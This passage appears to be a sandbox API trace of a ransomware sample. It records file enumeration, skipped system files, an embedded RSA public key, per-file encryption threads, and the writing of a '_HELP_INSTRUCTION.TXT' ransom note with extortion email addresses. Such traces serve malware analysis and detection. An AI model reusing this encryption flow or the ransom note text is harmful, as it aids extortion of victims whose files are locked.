(lpFirst="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpSrch="ntldr") returned 0x0 [0106.928] StrStrW (lpFirst="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpSrch="NTLDR") returned 0x0 [0106.928] StrStrW (lpFirst="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0106.928] StrStrW (lpFirst="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0106.928] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0106.928] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0106.928] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0106.928] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0106.928] lstrcpyW (in: lpString1=0x17addc, lpString2="9345D86A0F87DA84ADA8003E13B4BECC.XZZX" | out: lpString1="9345D86A0F87DA84ADA8003E13B4BECC.XZZX") returned="9345D86A0F87DA84ADA8003E13B4BECC.XZZX" [0106.928] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0106.928] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3c0 [0106.929] Sleep (dwMilliseconds=0x96) [0107.084] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0107.084] lstrcmpW (lpString1="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpString2="..") returned 1 [0107.084] lstrcmpW (lpString1="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpString2=".") returned 1 [0107.084] StrStrW (lpFirst="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0107.084] StrStrW (lpFirst="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpSrch="ntldr") returned 0x0 [0107.084] StrStrW (lpFirst="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpSrch="NTLDR") returned 0x0 [0107.084] StrStrW (lpFirst="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0107.084] StrStrW (lpFirst="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpSrch="ntdetect.com") returned 0x0 [0107.084] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0107.084] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0107.084] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0107.084] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0107.084] lstrcpyW (in: lpString1=0x17addc, lpString2="A216BEA01542C25C94FD01F0195AA6A4.XZZX" | out: lpString1="A216BEA01542C25C94FD01F0195AA6A4.XZZX") returned="A216BEA01542C25C94FD01F0195AA6A4.XZZX" [0107.084] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0107.084] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3c4 [0107.084] Sleep (dwMilliseconds=0x96) [0107.240] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0107.240] lstrcmpW (lpString1="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpString2="..") returned 1 [0107.240] lstrcmpW (lpString1="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpString2=".") returned 1 [0107.240] StrStrW (lpFirst="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0107.240] StrStrW (lpFirst="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpSrch="ntldr") returned 0x0 [0107.240] StrStrW (lpFirst="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpSrch="NTLDR") returned 0x0 [0107.240] StrStrW (lpFirst="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0107.240] StrStrW (lpFirst="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpSrch="ntdetect.com") returned 0x0 [0107.240] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0107.240] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0107.240] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0107.240] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0107.240] lstrcpyW (in: lpString1=0x17addc, lpString2="E47D77FB28AD6F18CEB95D752CDA5360.XZZX" | out: lpString1="E47D77FB28AD6F18CEB95D752CDA5360.XZZX") returned="E47D77FB28AD6F18CEB95D752CDA5360.XZZX" [0107.240] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0107.240] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3c8 [0107.241] Sleep (dwMilliseconds=0x96) [0107.396] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0107.396] lstrcmpW (lpString1="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpString2="..") returned 1 [0107.396] lstrcmpW (lpString1="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpString2=".") returned 1 [0107.396] StrStrW (lpFirst="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0107.396] StrStrW (lpFirst="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpSrch="ntldr") returned 0x0 [0107.396] StrStrW (lpFirst="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpSrch="NTLDR") returned 0x0 [0107.396] StrStrW (lpFirst="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0107.396] StrStrW (lpFirst="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpSrch="ntdetect.com") returned 0x0 [0107.396] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0107.396] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0107.396] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0107.397] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0107.397] lstrcpyW (in: lpString1=0x17addc, lpString2="E85C7261086E23DEDFC379D70C9B0826.XZZX" | out: lpString1="E85C7261086E23DEDFC379D70C9B0826.XZZX") returned="E85C7261086E23DEDFC379D70C9B0826.XZZX" [0107.397] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0107.397] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3cc [0107.397] Sleep (dwMilliseconds=0x96) [0107.552] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0107.552] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0107.552] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0107.552] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0107.552] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0107.552] FindClose (in: hFindFile=0x3a5650 | out: hFindFile=0x3a5650) returned 1 [0107.553] FindClose (in: hFindFile=0x3a5650 | out: hFindFile=0x3a5650) returned 0 [0107.553] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1" [0107.553] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*" [0107.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0107.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0107.553] SetErrorMode (uMode=0x1) returned 0x1 [0107.553] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\_HELP_INSTRUCTION.TXT") returned 98 [0107.554] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0107.554] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0107.554] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0x3d0) returned 0x0 [0107.554] RegQueryValueExW (in: hKey=0x3d0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cb4dc0, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x3cb4dc0*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0107.554] RegCloseKey (hKey=0x3d0) returned 0x0 [0107.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0107.554] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0107.554] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0107.555] CloseHandle (hObject=0x3d0) returned 1 [0107.556] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3a5650 [0107.556] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1") returned="IkpxUp8UshIgHl1" [0107.556] lstrcpyW (in: lpString1=0x17a5a4, lpString2="IkpxUp8UshIgHl1" | out: lpString1="IkpxUp8UshIgHl1") returned="IkpxUp8UshIgHl1" [0107.556] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0107.556] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0107.556] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0107.556] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0107.556] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0107.556] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0107.556] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0107.556] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0107.556] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0107.556] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0107.556] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0107.556] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0107.556] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0107.556] FindClose (in: hFindFile=0x3a5650 | out: hFindFile=0x3a5650) returned 1 [0107.556] FindClose (in: hFindFile=0x3a5650 | out: hFindFile=0x3a5650) returned 0 [0107.556] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0107.556] lstrcmpW (lpString1="ZW28zqHzfxAY2NV", lpString2="..") returned 1 [0107.556] lstrcmpW (lpString1="ZW28zqHzfxAY2NV", lpString2=".") returned 1 [0107.556] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" [0107.557] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0107.557] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpString2="ZW28zqHzfxAY2NV" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV" [0107.557] SetErrorMode (uMode=0x1) returned 0x1 [0107.557] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV" [0107.557] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0107.557] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0107.557] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*" [0107.557] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3a5650 [0107.558] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV") returned="ZW28zqHzfxAY2NV" [0107.558] lstrcpyW (in: lpString1=0x17a5a4, lpString2="ZW28zqHzfxAY2NV" | out: lpString1="ZW28zqHzfxAY2NV") returned="ZW28zqHzfxAY2NV" [0107.558] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0107.558] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0107.558] lstrcmpW (lpString1="0FE24CF432281F2497377D743655036C.XZZX", lpString2="..") returned 1 [0107.558] lstrcmpW (lpString1="0FE24CF432281F2497377D743655036C.XZZX", lpString2=".") returned 1 [0107.558] StrStrW (lpFirst="0FE24CF432281F2497377D743655036C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0107.558] StrStrW (lpFirst="0FE24CF432281F2497377D743655036C.XZZX", 